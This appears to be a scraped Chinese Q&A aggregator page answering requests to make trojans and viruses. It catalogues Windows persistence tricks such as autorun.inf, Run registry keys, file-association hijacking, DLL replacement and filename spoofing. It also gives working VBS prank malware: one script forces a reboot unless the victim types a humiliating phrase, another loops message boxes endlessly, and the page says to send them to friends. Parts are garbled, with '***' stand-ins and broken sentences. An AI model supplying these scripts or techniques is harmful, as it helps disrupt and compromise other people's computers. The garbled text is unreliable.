本文目录一览:
- 1、怎么样 *** 木马?
- 2、文件类型是txt记事本,也可以成为木马或病毒吗?
- 3、我需要木马病毒
- 4、用记事本 *** 一些病毒,或者快捷按钮
- 5、怎么做一个简单的小病毒
- 6、记事本中木马怎样办,麻烦详细点
怎么样 *** 木马?
*** 时代可不太平,谁没有遭遇过病毒或木马?从CIH、I Love You到红色代码、Nimda,从BO到冰河,无一不是网友经常懈逅的对象。怎么避免这些“艳遇”是广大用户孜孜以求的目标,不过,“道高一尺,魔高一丈”,“防”永远是落后的,主动消灭它们才是积极主动的。
要消灭它们,首先就要掌握病毒及木马是怎么入侵我们的"爱机"的。有关病毒及木马的入侵招数的文章很多,但都不太全面,编者偶然间发现了一篇作者不详,但内容颇为全面的文章,特意整理出来,希望对大家有所帮助。
一、修改批处理
很古老的 *** ,但仍有人使用。一般通过修改下列三个文件来作案:
Autoexec.bat(自动批处理,在引导系统时执行)
Winstart.bat(在启动GUI图形界面环境时执行)
Dosstart.bat(在进入MS-DOS方式时执行)
例如:编辑C:\\windows\\Dosstart.bat,加入:start Notepad,当你进入“MS-DOS方式”时,就可以看到记事本被启动了。
二、修改系统配置
常使用的 *** ,通过修改系统配置文件System.ini、Win.ini来达到自动运行的目的,涉及范围有:
在Win.ini文件中:
[windows]
load=程序名
run=程序名
在System.ini文件中:
[boot]
shell=Explorer.exe
其中修改System.ini中Shell值的情况要多一些,病毒木马通过修改这里使自己成为Shell,然后加载Explorer.exe,从而达到控制用户电脑的目的。
三、借助自动运行功能
这是黑客最新研发成果,之前该 *** 不过被发烧的朋友用来修改硬盘的图标而已,如今它被赋予了新的意义,黑客甚至声称这是Windows的新BUG。
Windows的自动运行功能确实很烂,早年许多朋友因为自动运行的光盘中带有CIH病毒而中招,现在不少软件可以方便地禁止光盘的自动运行,但硬盘呢?其实硬盘也支持自动运行,你可尝试在D盘根目录下新建一个Autorun.inf,用记事本打开它,输入如下内容:
[autorun]
open=Notepad.exe
保存后进入“我的电脑”,按F5键刷新一下,然后双击D盘盘符,怎么样?记事本打开了,而D盘却没有打开。
当然,以上只是一个简单的实例,黑客做得要精密很多,他们会把程序改名为“.exe”(不是空格,而是中文的全角空格,这样在Autorun.inf中只会看到“open=”而被忽略,此种行径在修改系统配置时也常使用,如“run=”;为了更好地隐藏自己,其程序运行后,还会替你打开硬盘,让你难以查觉。
由此可以推想,如果你打开了D盘的共享,黑客就可以将木马和一个Autorun.inf存入该分区,当Windows自动刷新时,你也就“中奖”了,因此,大家千万不要共享任何根目录,当然更不能共享系统分区(一般为C:)。
四、通过注册表中的Run来启动
很老套的 *** ,但80%的黑客仍在使用,通过在Run、RunOnce、RunOnceEx、RunServices、RunServicesOnce中添加键值,可以比较容易地实现程序的加载,黑客尤其方便在带”Once”的主键中作手脚,因此带“Once”的主键中的键值,在程序运行后将被删除,因此当用户使用注册表修改程序查看时,不会发现异样。另外,还有这样的程序:在启动时删除Run中的键值,而在退出时(或关闭系统时)又添加键值,达到隐蔽自己的目的。(这种 *** 的缺点是:害怕恶意关机或停电,呵呵!)
五、通过文件关联启动
很受黑客喜爱的方式,通过EXE文件的关联(主键为:exefile),让系统在执行任何程序之前都运行木马,真的好毒!通常修改的还有txtfile(文本文件的关联,谁不用用记事本呢?)、regfile(注册表文件关联,一般用来防止用户恢复注册表,例如让用户双击.reg文件就关闭计算机)、unkown(未知文件关联)。为了防止用户恢复注册表,用此法的黑客通常还连带谋杀scanreg.exe、sfc.exe、Extrac32.exe、regedit.exe等程序,阻碍用户修复。
六、通过API HOOK启动
这种 *** 较为高级,通过替换系统的DLL文件,让系统启动指定的程序。例如:拨号上网的用户必须使用Rasapi32.dll中的API函数来进行连接,那么黑客就会替换这个DLL,当用户的应用程序调用这个API函数,黑客的程序就会先启动,然后调用真正的函数完成这个功能(特别提示:木马可不一定是EXE,还可以是DLL、VXD),这样既方便又隐蔽(不上网时根本不运行)。中此绝毒的虫子,只有两种选择:Ghost或重装系统,幸好此毒廖廖无几,实属万虫之幸!
API的英文全称为:Application Programming Interface,也就是应用程序编程接口。在Windows程序设计领域发展初期,Windows程序员所能使用的编程工具唯有API函数,这些函数是Windows提供给应用程序与操作系统的接口,他们犹如“积木块”一样,可以搭建出各种界面丰富,功能灵活的应用程序。所以可以认为API函数是构筑整个Windows框架的基石,在它的下面是Windows的操作系统核心,而它的上面则是所有华丽的Windows应用程序。
七、通过VXD启动
此法也是高手专用版,通过把木马写成VXD形式加载,直接控制系统底层,极为罕见。它们一般在注册表[HKEY_ LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\VxD]主键中启动,很难发觉,解决 *** 更好也是用Ghost恢复或重新干净安装。
八、通过浏览网页启动
通过此种途径有两种 *** :
利用MIME漏洞:这是2001年黑客中更流行的手法,因为它简单有效,加上宽带网的流行,令用户防不胜防,想一想,仅仅是鼠标变一下“沙漏”,木马就安装妥当,Internet真是太“方便”了!不过今年有所减少,一方面许多人都改用IE6.0;另一方面,大部分个人主页空间都不允许上传.eml文件了。
MIME被称为多用途Internet邮件扩展(Multipurpose Internet Mail Extensions),是一种技术规范,原用于电子邮件,现在也可以用于浏览器。MIME对邮件系统的扩展是巨大的,在它出现前,邮件内容如果包含声音和动画,就必须把它变为ASCII码或把二进制的信息变成可以传送的编码标准,而接收方必须经过解码才可以获得声音和图画信息。MIME提供了一种可以在邮件中附加多种不同编码文件的 *** ,这与原来的邮件是大大不同的。而现在MIME已经成为了HTTP协议标准的一个部分。
九、利用Java applet
划时代的Java更高效、更方便——不过是悄悄地修改你的注册表,让你千百次地访问黄(黑)色网站,让你关不了机,让你……,还可以让你中木马。这种 *** 其实很简单,先利用HTML把木马下载到你的缓存中,然后修改注册表,指向其程序。
十、利用系统自动运行的程序
这一条主要利用用户的麻痹大意和系统的运行机制进行,命中率很高。在系统运行过程中,有许多程序是自动运行的,比如:磁盘空间满时,系统自动运行“磁盘清理”程序(cleanmgr.exe);启动资源管理器失败时,双击桌面将自动运行“任务管理器”程序(Taskman.exe);格式化磁盘完成后,系统将提示使用“磁盘扫描”程序(scandskw.exe);点击帮助或按F1时,系统将运行Winhelp.exe或Hh.exe打开帮助文件;启动时,系统将自动启动“系统栏”程序(SysTray.exe)、“输入法”程序(internat.exe)、“注册表检查” 程序(scanregw.exe)、“计划任务”程序(Mstask.exe)、“电源管理”程序等。
这为恶意程序提供了机会,通过覆盖这些文件,不必修改任何设置系统就会自动执行它们!而用户在检查注册表和系统配置时不会引起任何怀疑,例如“注册表检查” 程序的作用是启动时检查和备份注册表,正常情况不会有任何提示,那么它被覆盖后真可谓是“神不知、鬼不觉”。当然,这也许会被“系统文件检查器”检查(但勤快的人不多)出来。
黑客还有一高招“偷天换日”!不覆盖程序也可达到这个目的, *** 是:利用System目录比Windows目录优先的特点,以相同的文件名,将程序放到System目录中。你可以试试,将Notepad.exe(记事本)复制到System目录中,并改名为Regedit.exe(注册表编辑器),然后从“开始”→“运行”中,输入“Regedit”回车,你会发现运行的竟然是那个假冒的Notepad.exe!同样,如果黑客将程序放到System中,然后在运行时调用真正的Regedit,谁知道呢?(这种 *** 由于大部分目标程序不是经常被系统调用,因此常被黑客用来作为被删除后的恢复 *** ,如果某个东东被删除了又出现,不妨检查检查这些文件。)
十一、还有什么“高招”
黑客还常常使用名字欺骗技术和运行假象与之配合。名字欺骗技术如上述的全角空格主文件名“.exe”就是一例,另外常见的有在修改文件关联时,使用“ ”(ASCII值255,输入时先按下Alt键,然后在小键盘上输入255)作为文件名,当这个字符出现在注册表中时,人们往往很难发现它的存在。此外还有利用字符相似性的,如:“Systray.exe”和“5ystray”(5与大写S相似);长度相似性的,如:“Explorer.exe”和“Explore.exe”(后者比前者少一个字母,心理学实验证明,人的之一感觉只识别前四个字母,并对长度不敏感);运行假象则是指运行某些木马时,程序给出一个虚假的提示来欺骗用户。一个运行后什么都没有的程序,地球人都知道不是什么好东西;但对于一个提示“内存不足的程序,恐怕还在埋怨自己的内存太少哩!
文件类型是txt记事本,也可以成为木马或病毒吗?
TXT的记事本肯定是无法包含任何木马病毒的,这个你可以放心
如果你的电脑有异常的话,也可以使用电脑管家杀毒功能来查杀一下看看是否中毒了
如果中毒,按照提示清除即可
我需要木马病毒
*** 如下:在开始内点击运行输入at xx:xx shutdown -s,xx:xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机 如果要取消,就输入shutdown -a就可以取消了.
我听一个朋友说,有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。
脚本,例如下面的东西。就可以实现。
1。
首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看
把隐藏已知文件类型的扩展名前面的勾去掉.
然后我们开始 *** .在桌面建立个记事本,然后把下面代码复制进去
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,你试试···"" ",0 ,true
dim a
do while(a "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,呵呵,猪"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用 *** 发给你朋友,对方打
开了就在60秒内要关闭计算机,
结素任务都不行,他只能说他是猪才能解决问题。够坏吧? 注意哦,你可以把我是猪那个修改成任
意想说的话,要是对付你喜欢的人,
就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打
开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?
第2招编写VBS脚本
首先你可以看下面的
WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"TSName)
WScript.Echo("你是可爱的小朋吗?")
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关心我")
WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")
WScript.Echo("小强很生气,后果很严重哦。")
WScript.Echo("嘿嘿!你也会很惨滴哦")
WScript.Echo("是不是想清除我?")
WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")
WScript.Echo("还剩49下,快点点哦")
WScript.Echo("还剩48下,快点,小笨蛋!")
WScript.Echo("还剩47下对,就这样快点点!")
WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。")
WScript.Echo("还剩45下,记得要快哦!")
WScript.Echo("还剩43下")
WScript.Echo("还剩42下")
WScript.Echo("还剩41下")
WScript.Echo("还剩40下")
WScript.Echo("还剩39下")
WScript.Echo("还剩38下")
WScript.Echo("还剩37下")
WScript.Echo("还剩36下")
WScript.Echo("还剩35下")
WScript.Echo("还剩34下")
WScript.Echo("还剩33下")
WScript.Echo("还剩32下")
WScript.Echo("还剩30下")
WScript.Echo("还剩29下")
WScript.Echo("还剩28下")
WScript.Echo("还剩27下")
WScript.Echo("还剩26下")
WScript.Echo("还剩25下")
WScript.Echo("还剩24下")
WScript.Echo("还剩23下")
WScript.Echo("还剩22下")
WScript.Echo("还剩21下")
WScript.Echo("还剩20下")
WScript.Echo("还剩19下")
WScript.Echo("还剩18下")
WScript.Echo("还剩17下")
WScript.Echo("还剩16下")
WScript.Echo("还剩15下")
WScript.Echo("还剩14下")
WScript.Echo("还剩13下停停!!!慢点,我有话要说")
WScript.Echo("还剩12下,你继续点我就会消失滴")
WScript.Echo("还剩11下,以后就看不到我拉。555555")
WScript.Echo("还剩10下,你现在可以选择停止!")
WScript.Echo("还剩9下。你还点啊,不要我拉?")
WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")
WScript.Echo("还剩7下。疯了,你有点负意!")
WScript.Echo("还剩6下。对。你就点吧,我恨你!")
WScript.Echo("还剩5下,不明白,删除我你就好吗?")
WScript.Echo("还剩4下!真要删除我?")
WScript.Echo("还剩3下。可是我真的很眷恋你。。。")
WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!")
WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!")
WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
把这个复制在记事本,把后缀修改成.vbs
在打开呢就会先说之一句的 嘿,谢谢你打开我哦,我等你很久拉!
他无论是点关闭或者是点确定都会再说第2句
再点就说地3句 会按顺序说完
你们注意哦,最后10句话,只是10句,你要是把这个复制再粘贴N次,那他还有个打完呢?
这样才做到整人了,要是给喜欢的人发去啊,那就写你要说的话吧,双引号里面的可以随便更改
这个最简单的就是结素任务来结束它
2。
把以下代码复制到记事本中 然后重命名为后缀名为VBS的文件~
do
msgbox"爽死你~"
loop
Windows XP的关机是由Shutdown.exe程序来控制的,位于Windows\System32文件夹中。如
果想让Windows 2000也实现同样的效果,可以把Shutdown.exe复制到系统目录下。
比如你的电脑要在22:00关机,可以选择“开始→运行”,输入“at 22:00 Shutdown -s”,
这样,到了22点电脑就会出现“系统关机”对话框,默认有30秒钟的倒计时并提示你保存工
作。如果你想以倒计时的方式关机,可以输入“Shutdown.exe -s -t 3600”,这里表示60
分钟后自动关机,“3600”代表60分钟。
设置好自动关机后,如果想取消的话,可以在运行中输入“shutdown -a”。另外输入
“shutdown -i”,则可以打开设置自动关机对话框,对自动关机进行设置。
Shutdown.exe的参数,每个都具有特定的用途,执行每一个都会产生不同的效果,比如
“-s”就表示关闭本地计算机,“-a”表示取消关机操作,下面列出了更多参数,大家
可以在Shutdown.exe中按需使用。
-f:强行关闭应用程序
-m \\计算机名:控制远程计算机
-i:显示图形用户界面,但必须是Shutdown的之一个选项
-l:注销当前用户
-r:关机并重启
-t 时间:设置关机倒计时
-c "消息内容":输入关机对话框中的消息内容(不能超127个字符)
有时候,我们需要定时关闭计算机,下面介绍一个在Windows XP下实现定时关机的简单方
法。
指定系统在22分钟后自动关闭:点击“开始→运行”,在“打开”中输入命令“Shutdown
-s -t 1320”(注意:引号不输入,参数之间有空格,1320的单位是秒),单击“确定”
按钮即可。
指定系统在某个时间(比如12:00)自动关闭:在“打开”中输入命令
“at 12:00 Shutdown -s”即可。
取消定时关机:在“打开”中输入命令“Shutdown -a”即可。
能的实现都是使用“Shutdown”命令实现的,shutdown的参数是在命令行窗口中输入
“shutdown”。笔者认为最有用的是“-i”参数,可以调出“远程关机对话框”,
能方便地实现局域网内计算机的远程关机,有兴趣的朋友可以试一试。
开始-程序-附件-系统工具-计划任务-添加任务计划-下一步-浏览
-c:\windows\system32\shadow.exe-下一步-选好要关机的时间,
下一步-输入用户名和密码,只要是系统里有的用户就行,但一定要有密码,
没有也要设一个,下一步,选上“在完成时打开此任务的高级属性”,
在运行栏后面加上“ -S”引号不要哦。
用记事本 *** 一些病毒,或者快捷按钮
愿我的答案 能够解决您的烦忧
这个代码可以去卡饭找,你说的要找的叫源代码,不过病毒威力很大想学学可以
1,学完按我说的彻底查杀掉,不然你自己就中毒了。
2,下载腾讯电脑管家“8.5”最新版,对电脑首先进行一个体检,打开所有防火墙避免系统其余文件被感染。
3,打开杀毒页面开始查杀,切记要打开小红伞引擎。
4,如果普通查杀不能解决问题,您可以打开腾讯电脑管家---工具箱---顽固木马专杀- 进行深度
扫描。
5,查杀处理完所有病毒后,立刻重启电脑,再进行一次安全体检,清除多余系统缓存文件,避免二次感染。
如果您对我的答案不满意,可以继续追问或者提出宝贵意见,谢谢
怎么做一个简单的小病毒
AUTO病毒简介:这种病毒在每个驱动器(硬盘、MP3/MP4……)下都有一个卷标AutoRun.inf文件,只要你双击驱动器(如D:),就会激活病毒。感染后双击盘符打不开驱动器,而且会导致病毒复制一次!
病毒不像是什么东西,他是一种可以执行的程序,没有所谓简单的病毒,每个病毒程序都有自己运行的目的,比如盗取用户资料或远程控制等.要想生成这种程序,你得必须会一种计算机语言.比如C++,VB,等只有这样才可以 *** 程序.
还有一种就是用别人的木马工具生成所谓的病毒,发送到别人的电脑上让其运行,比如众所周知的灰鸽子,及很多盗号的小型软件.
不论是什么方式 *** 你都要先懂得病毒的运行机理,电脑的传输方式,杀毒软件的杀毒原理.
你的这个问题是一个很深奥的问题,病毒没有简单和复杂只分,所谓的简单的病毒实际上都是比较精练的程序.
如果真想 *** 病毒可以给你些网站:
记事本中木马怎样办,麻烦详细点
记事本编写程序代码却没编译功能所用windows自带记事本编木马理论能立
楼主所木马能编译程序候给EXE木马挂记事本图标看起像记事本其实木马
防范简单记事本文件缀名.txt病毒程序.exe
要注意隐藏已知文件类型选项给取消
些狡猾病毒 *** 者给病毒命名候加比(重要文件.txt)名字迷惑咱
其实(重要文件.txt.exe)
J